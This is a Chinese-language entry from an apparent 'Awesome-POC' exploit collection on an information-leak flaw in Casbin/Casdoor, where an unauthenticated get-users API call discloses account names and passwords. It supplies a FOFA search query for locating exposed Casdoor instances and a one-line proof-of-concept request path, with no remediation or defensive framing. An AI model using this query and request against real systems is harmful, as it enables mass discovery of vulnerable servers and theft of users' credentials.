Awesome-POC/Web应用漏洞/Casbin get-users 账号密码泄漏漏洞.md
2022-12-05 11:09:28 +08:00

31 lines
440 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Casbin get-users 账号密码泄漏漏洞
## 漏洞描述
Casbin get-users api接口存在账号密码泄漏漏洞攻击者通过漏洞可以获取用户敏感信息
## 漏洞影响
```
Casbin
```
## FOFA
```
title="Casdoor"
```
## 漏洞复现
登录页面
![image-20220524143206718](./images/202205241432780.png)
验证POC
```
/api/get-users?p=123&pageSize=123
```
![image-20220524143215583](./images/202205241432624.png)